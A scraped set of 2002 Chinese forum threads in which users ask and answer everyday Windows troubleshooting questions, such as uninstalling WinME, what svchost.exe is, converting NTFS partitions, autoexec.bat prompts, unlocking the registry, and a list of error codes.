 发表于 2002-02-19 13:09:24 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
FLY,这样可以安全删除WINME？？

::古落根门::

唯有不断学习 才能不断进步

Fly

Developer
积分：4146
发帖：1028
来自：
注册：2001-10-31
 发表于 2002-02-19 13:28:31 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
这样做可以恢复系统引导,把C给FORMAT后,用用这个

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-19 13:49:42 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
其实直接在XP下面把me的几个系统文件删了也行

::古落根门::

唯有不断学习 才能不断进步

imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-02-19 13:55:23 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
呵呵……你那样子的做法也说的过去！设置成默认XP,删除ME,不出现选择系统的列表，那样看上去效果还不错，不过我觉得还是重新安装一个比较保险！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
masijia

高级用户
积分：221
发帖：60
来自：西安
注册：2002-02-08
 发表于 2002-02-20 15:28:10 按此观看masijia的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给masijia 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看masijia的IP
在XP中设置WINXP为莫认操作系统,用WIN98启动盘启动系统至DOS下,FORMAT C盘
在FDISK中选第二项,设D盘为启动盘即可.
北极猫

高级用户
积分：166
发帖：44
来自：
注册：2001-12-24
 发表于 2002-02-21 09:29:31 按此观看北极猫的个人资料 按此发邮件给北极猫 发送悄悄话给北极猫 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看北极猫的IP
谢谢，各位帮忙
我是建立的boot.ini 文件ME已经删了
这下硬盘又多出不少空间,哈哈
昨天刚装了摄象头
在XP下边用好使啊
网上也可以看见MM的的样子了
就是没发现有好看地
上一贴 | 下一贴
快速回复 主题：在WINME下装完XP，如何把WINME卸掉？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


svchost.exe是什么东东? - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
svchost.exe是什么东东?

上一贴 | 下一贴
发表人 主题: svchost.exe是什么东东?
高风

终级用户
积分：487
发帖：402
来自：重庆—成都
注册：2001-01-04
 发表于 2002-02-24 17:13:04 按此观看高风的个人资料 按此发邮件给高风 访问高风的主页 高风 的 oicq 是87468690,查看 87468690 的资料 收藏该主题供以后查看 发送悄悄话给高风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高风的IP
出现在WinXP进程列表里，什么东东，不会是木马吧？

那位大虾指点一二！

南台静坐一炉香 终日凝然万虑忘
不是息心去妄想 都缘无事可商量
……………………………………………
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-24 20:06:07 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
http://netsafe.ayinfo.ha.cn/news/102704.htm

引用:

Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位
在系统的%systemroot%\system32文件夹下。在启动的时候，Svchost.exe检查注册表中的位置来构建需要
加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务，
以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 主题：svchost.exe是什么东东?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


WINXP 里的"查找"在那里?Helpctr.exe是什 - 经 典 论 坛

计算机技术
WINXP 里的"查找"在那里?Helpctr.exe是什

上一贴 | 下一贴
发表人 主题: WINXP 里的"查找"在那里?Helpctr.exe是什
叶竟

终级用户
积分：628
发帖：174
来自：中国
注册：2001-11-19
 发表于 2002-02-23 16:21:01 按此观看叶竟的个人资料 按此发邮件给叶竟 收藏该主题供以后查看 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
WINXP 里的"查找"在那里?Helpctr.exe是什程序

我怎么在关闭程序时 怎么它总是说出错：： 请教了

巍笑

Vshine
积分：1803
发帖：1215
来自：江西南昌
注册：2001-11-16
 发表于 2002-02-23 21:40:42 按此观看巍笑的个人资料 按此发邮件给巍笑 访问巍笑的主页 巍笑 的 oicq 是419098,查看 419098 的资料 发送悄悄话给巍笑 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看巍笑的IP
我也没XP查找功能，惨啊，买过张吧，神州版还可以，一张碟的

Vshi.com
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-02-23 21:43:00 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
Helpctr启动帮助和支持中心。使用不带参数的 helpctr 可以显示“帮助和支持中心”首页。

语法
helpctr [/url [URL]] [/mode [URL]] [/hidden] [/fromstarthelp]

参数
/url [URL]
指定要在“帮助和支持中心”中显示的统一资源标识符 (URL)。
/mode [URL]
指定符合 Launch_Description.dtd 计划的可扩展标记语言 (XML) 定义文件，该文件可以控制“帮助和支持中心”的上下文、布局和内容。
/hidden
不显示用户界面启动“帮助和支持中心”。该命令可以装载主题。可以使用本命令执行远程管理脚本。
/fromstarthelp
启动一个新的“帮助和支持中心”实例。
/?
在命令提示符显示帮助。
注释
使用 URL
使用 /url 和 /mode 时，可以使用 URL 的引号（即 "URL"）。如果 URL 中有空格，则可通过键入 %20 代替它（即 "URL%20Address"）。

范例
要用.msrincident 文件启动一个远程帮助会话，请键入：

HelpCtr /mode "hcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/Remote%20Assistance/RAClientLayout.xml"/url "hcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/Remote%20Assistance/Interaction/Client/rctoolScreen1.htm?IncidentFile=rahelp.msrincident"

等我想想再签
上一贴 | 下一贴
快速回复 主题：WINXP 里的"查找"在那里?Helpctr.exe是什
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


如何在WIN2000 的DOS 提示符下 把NTFS 文件 - 经 典 论 坛

计算机技术
如何在WIN2000 的DOS 提示符下 把NTFS 文件

上一贴 | 下一贴
发表人 主题: 如何在WIN2000 的DOS 提示符下 把NTFS 文件
叶竟

终级用户
积分：628
发帖：174
来自：中国
注册：2001-11-19
 发表于 2002-02-20 21:19:24 按此观看叶竟的个人资料 按此发邮件给叶竟 收藏该主题供以后查看 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
NTFS 格式转化为 FAT32 ？

怎么做？ 我用分区魔术师 好象不行 请教高手了

piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-02-20 21:23:15 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
分区魔术师当然可以，不过不是在DOS下，而是WINDOWS界面下

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-20 21:26:30 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
建议在ms-dos模式下进行转换，安全性好一点，在win下，很容易造成丢失数据

{ KUka ALl wAYs wITh yOU }
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-02-20 21:29:30 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
没事吧，我作过好多次了，没什么事呀

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
叶竟

终级用户
积分：628
发帖：174
来自：中国
注册：2001-11-19
 发表于 2002-02-20 21:38:28 按此观看叶竟的个人资料 按此发邮件给叶竟 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
kirsten9在上个帖子中说
引用:
建议在ms-dos模式下进行转换，安全性好一点，在win下，很容易造成丢失数据

我试了 不行 我是用的7。0 当然是在 WIN 界面下 但是在转化时 是要启动到DOS
界面下的，但是 我到了那一步 后 显示 说是有错误 让我重新启动到 WIN2000 XI下

叶竟

终级用户
积分：628
发帖：174
来自：中国
注册：2001-11-19
 发表于 2002-02-20 21:39:37 按此观看叶竟的个人资料 按此发邮件给叶竟 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
kirsten9在上个帖子中说
引用:
建议在ms-dos模式下进行转换，安全性好一点，在win下，很容易造成丢失数据

具体步骤 我不是很懂 能大体解释一下吗 ？谢谢

piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-02-20 21:50:24 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
好像PQ分区FAT的只能分2G，多分就不行

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
quakerman

高级用户
积分：221
发帖：199
来自：
注册：2001-07-23
 发表于 2002-02-21 09:25:47 按此观看quakerman的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给quakerman 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看quakerman的IP
还有一种可能就是使用了dma66/100的硬盘控制卡，这样pm就不能在win2000下使用了，win2000对scsi设备有保护。

感情就像一粒种，不管你对他掉眼泪还是撒尿，他都可能发芽……
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-21 23:23:59 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
7.0是不可以在2000下将NTFS-》FAT的

::古落根门::

唯有不断学习 才能不断进步

dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-22 12:58:43 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
好像所有版本的PM都是在dos下进行转换的吧？所谓的Windows下操作不过是建立任务文件罢了，而且你使用的PM语言一定要和Win的语言版本一样阿，不然可能够你麻烦的。

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

lster

超级用户
积分：369
发帖：137
来自：陕西，中国
注册：2001-08-22
 发表于 2002-02-22 14:34:58 按此观看lster的个人资料 按此发邮件给lster lster 的 oicq 是2516449,查看 2516449 的资料 发送悄悄话给lster 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lster的IP
dancing在上个帖子中说
引用:
好像所有版本的PM都是在dos下进行转换的吧？所谓的Windows下操作不过是建立任务文件罢了，而且你使用的PM语言一定要和Win的语言版本一样阿，不然可能够你麻烦的。

胡说什么， 我用PM从来都是win下进行的,而且语言版本和win也不一样.

叶竟在上个帖子中说

引用:
我试了 不行 我是用的7。0 当然是在 WIN 界面下 但是在转化时 是要启动到DOS
界面下的，但是 我到了那一步 后 显示 说是有错误 让我重新启动到 WIN2000 XI下

我以前也遇到过这种情况,它提示你必须到dos下进行操作的时候,点取消,然后退出软件,重新运行一次,再进行操作,可能就不会要求你到dos下进行,不知道为什么!!
反正我这样成功过.GOOD LUCK!

If winter comes , can spring be far behind ? come on.....
上一贴 | 下一贴
快速回复 主题：如何在WIN2000 的DOS 提示符下 把NTFS 文件
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


关于autoexc.bat的问题 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
关于autoexc.bat的问题

上一贴 | 下一贴
发表人 主题: 关于autoexc.bat的问题
cancan

质子
积分：209
发帖：145
来自：shanghai
注册：2001-04-06
 发表于 2002-02-24 00:24:18 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 cancan 的 oicq 是44787750,查看 44787750 的资料 收藏该主题供以后查看 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP
开机以后，出现蓝天白云，接着就进入DOS，出现3个c盘的提示符，接着才进入windows。 有人说是autoexec.bat中出现了空行，删除就行。好像里面没有空行呀。
下面这一行是直接双击文件，出现的
C:\>PATH=C:\WINDOWS;C:\WINDOWS;C:\WINDOWS\COMMAND;C:\J2SDK1.4.0-BETA3\BIN;"C:\j2sdk1.4.0-beta3\bin"

而当我想对其进行编辑的时候，在dos下或者是用notepad打开时，出现的却是：
@if exist c:\WINDOWS\TEMP\KAV_PROC.BAT call c:\WINDOWS\TEMP\KAV_PROC.BAT
PATH=%PATH%;"C:\j2sdk1.4.0-beta3\bin"

我猜问题是出现在“C:\>PATH=C:\WINDOWS;C:\WINDOWS;C:\WINDOWS\COMMAND;”
只有把它删除多余的，才能将开机时的提示符去掉，怎么才能去掉了。

如果问题不是出现在这里，那么怎么才能去掉开机时的提示符呢？

思 者 无 疆
eden

高级用户
积分：151
发帖：41
来自：北京
注册：2002-01-26
 发表于 2002-02-24 00:36:35 按此观看eden的个人资料 按此发邮件给eden eden 的 oicq 是1292510,查看 1292510 的资料 发送悄悄话给eden 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看eden的IP
你是不是装了金山毒霸？装了金山毒霸具有这种问题出现。

|　无　欲　则　刚　|
kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-24 08:47:18 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
“系统”--“环境变量”-"path"，自己手动修改

{ KUka ALl wAYs wITh yOU }
cancan

质子
积分：209
发帖：145
来自：shanghai
注册：2001-04-06
 发表于 2002-02-24 20:36:22 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 cancan 的 oicq 是44787750,查看 44787750 的资料 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP
kirsten9在上个帖子中说
引用:
“系统”--“环境变量”-"path"，自己手动修改

能改吗？？？？？

思 者 无 疆
数码狂人

终级用户
积分：1357
发帖：385
来自：只有数字的世界
注册：2001-09-30
 发表于 2002-02-24 20:43:13 按此观看数码狂人的个人资料 按此发邮件给数码狂人 访问数码狂人的主页 数码狂人 的 oicq 是1478222,查看 1478222 的资料 发送悄悄话给数码狂人 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看数码狂人的IP
@if exist c:\WINDOWS\TEMP\KAV_PROC.BAT call c:\WINDOWS\TEMP\KAV_PROC.BAT
PATH=%PATH%;"C:\j2sdk1.4.0-beta3\bin"
这句话的意思是如果存在kav_proc.bat文件，则执行之。对于WIN98以后的系统来说，autoexec.bat已经基本上没有用了，所以把它给删除了也未尝不可。但如果并不影响机器的速度，也不用太在意吧，我想。

我始终相信，自己是优秀的，但并不是最优秀的。所以我努力、用心，用心做好每件事……
渡江

高级用户
积分：300
发帖：83
来自：
注册：2002-02-04
 发表于 2002-02-25 02:51:25 按此观看渡江的个人资料 按此发邮件给渡江 渡江 的 oicq 是1679907,查看 1679907 的资料 发送悄悄话给渡江 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看渡江的IP
加个@号是指运行该命令时不显示....

渡江雪狼，难保自身.....
cancan

质子
积分：209
发帖：145
来自：shanghai
注册：2001-04-06
 发表于 2002-02-25 09:45:07 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 cancan 的 oicq 是44787750,查看 44787750 的资料 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP
数码狂人在上个帖子中说
引用:
@if exist c:\WINDOWS\TEMP\KAV_PROC.BAT call c:\WINDOWS\TEMP\KAV_PROC.BAT
PATH=%PATH%;"C:\j2sdk1.4.0-beta3\bin"
这句话的意思是如果存在kav_proc.bat文件，则执行之。对于WIN98以后的系统来说，autoexec.bat已经基本上没有用了，所以把它给删除了也未尝不可。但如果并不影响机器的速度，也不用太在意吧，我想。

想学java，所以自己建了一个autoexec.bat，本来是没有的。
但是我现在是想不删掉它，怎么去掉开机时的dos提示符，因为那个东西实在是影响开机的速度。谢谢你啦。

思 者 无 疆
上一贴 | 下一贴
快速回复 主题：关于autoexc.bat的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


关于WINXP的任务拦假死状态怎么办？（急急急） - 经 典 论 坛

计算机技术
关于WINXP的任务拦假死状态怎么办？（急急急）

上一贴 | 下一贴
发表人 主题: 关于WINXP的任务拦假死状态怎么办？（急急急）
cureme

初级用户
积分：74
发帖：21
来自：杭州，浙江，中国
注册：2001-06-12
 发表于 2002-02-21 21:16:21 按此观看cureme的个人资料 按此发邮件给cureme 访问cureme的主页 cureme 的 oicq 是1483600,查看 1483600 的资料 收藏该主题供以后查看 发送悄悄话给cureme 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cureme的IP
发现XP很大一个缺点：任务栏会出现假死的状态。而且这样情况绝对和CPU，内存没有关系，弟兄们知道哪里有补丁下呢？？？谢谢帮助！
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-02-21 21:37:49 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
microsoft的站点
系统自带的update应该可以

等我想想再签
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-21 22:09:27 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
XP的service pack还没有的吧

::古落根门::

唯有不断学习 才能不断进步

cureme8022

初级用户
积分：16
发帖：4
来自：
注册：2002-02-21
 发表于 2002-02-22 01:02:46 按此观看cureme8022的个人资料 按此发邮件给cureme8022 发送悄悄话给cureme8022 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cureme8022的IP
看是看到了有的，但是说是英文版，中文的哪里有能知道吗？谢谢了！
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-22 12:30:59 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
应该有中文的吧！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-02-22 12:50:14 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
ImHow在上个帖子中说
引用:
XP的service pack还没有的吧

只有hotfix

{ KUka ALl wAYs wITh yOU }
imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-02-22 13:39:32 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
那个补丁是英文版本的，中文的好象不能够用！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
cureme8022

初级用户
积分：16
发帖：4
来自：
注册：2002-02-21
 发表于 2002-02-24 11:41:04 按此观看cureme8022的个人资料 按此发邮件给cureme8022 发送悄悄话给cureme8022 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cureme8022的IP
是啊，我装的时候说中文版不能兼容的。还有什么地方有呢？
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-24 12:50:09 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
有个方法你试试 ， 打开 “文字服务和输入语言” ， 点选“语言兰” ， 将第一项的钩选 取消，确定，然后重起
cureme8022

初级用户
积分：16
发帖：4
来自：
注册：2002-02-21
 发表于 2002-02-24 22:30:28 按此观看cureme8022的个人资料 按此发邮件给cureme8022 发送悄悄话给cureme8022 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cureme8022的IP
非常感谢，关掉了就一切OK了！！！你是如何发现的？？？
上一贴 | 下一贴
快速回复 主题：关于WINXP的任务拦假死状态怎么办？（急急急）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


请问怎样解开被锁的注册表 - 经 典 论 坛

计算机技术
请问怎样解开被锁的注册表

上一贴 | 下一贴
发表人 | 主题: 请问怎样解开被锁的注册表
lnman 蓝色的风 积分：2434 发帖：593 来自：1000Script 注册：2001-07-17 | 发表于 2002-02-27 11:31:32 按此观看lnman的个人资料 按此发邮件给lnman 访问lnman的主页 lnman 的 oicq 是1247718,查看 1247718 的资料 收藏该主题供以后查看 发送悄悄话给lnman 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lnman的IP 最近不小心装了美萍网管软件，最坏的事情，就是装好了，管理员用我事先设好的密码进不去，把屏幕都锁了，将这个软件删掉，还是没用，不能删除注册表的相关主健 1000Script.com 一个 收集scripting脚本的网站 [插件] [教程] [论坛] [scripting库]
cancan 质子 积分：209 发帖：145 来自：shanghai 注册：2001-04-06 | 发表于 2002-02-27 11:40:55 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 cancan 的 oicq 是44787750,查看 44787750 的资料 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP 新建一个文本文件，输入以下内容（注意保持文本格式）： REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 点击"文件"菜单，选择"保存"命令，以"recover.reg"为文件名保存在任意位置。 2.)双击该"recover.reg"文件，系统弹出"是否确认要将 recover.reg 中的信息添加进注册表"的确认框，点是，随后，系统提示"recover.reg 里的信息已被成功地输入注册表"，再点击"确定"即可将注册表解锁并进行随后的修改。 思 者 无 疆
上一贴 | 下一贴
快速回复 主题：请问怎样解开被锁的注册表
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


windows蓝屏代码 - 经 典 论 坛

计算机技术
windows蓝屏代码

上一贴 | 下一贴
发表人 主题: windows蓝屏代码
dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-03-04 18:39:07 按此观看dancing的个人资料 按此发邮件给dancing 收藏该主题供以后查看 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
我们在使用Windows的时候，出现蓝屏是经常的事。大多数时候，我们只能reset，现在
公布蓝屏错误代码含义，以备使用。
0X0000 操作完成
0X0001 不正确的函数
0X0002 系统找不到指定的文件
0X0003 系统找不到指定的路径
0X0004 系统无法打开文件
0X0005 拒绝存取
0X0006 无效的代码
0X0007 内存控制模块已损坏
0X0008 内存空间不足，无法处理这个指令
0X0009 内存控制模块位址无效
0X000A 环境不正确
0X000B 尝试载入一个格式错误的程序
0X000C 存取码错误
0X000D 资料错误
0X000E 内存空间不够，无法完成这项操作
0X000F 系统找不到指定的硬盘
0X0010 无法移除目录
0X0011 系统无法将文件移到其他的硬盘
0X0012 没有任何文件
0X0019 找不到指定扇区或磁道
0X001A 指定的磁盘或磁片无法存取
0X001B 磁盘找不到要求的装置
0X001C 打印机没有纸
0X001D 系统无法将资料写入指定的磁盘
0X001E 系统无法读取指定的装置
0X001F 连接到系统的某个装置没有作用
0X0021 文件的一部分被锁定，现在无法存取
0X0024 开启的分享文件数量太多
0X0026 到达文件结尾
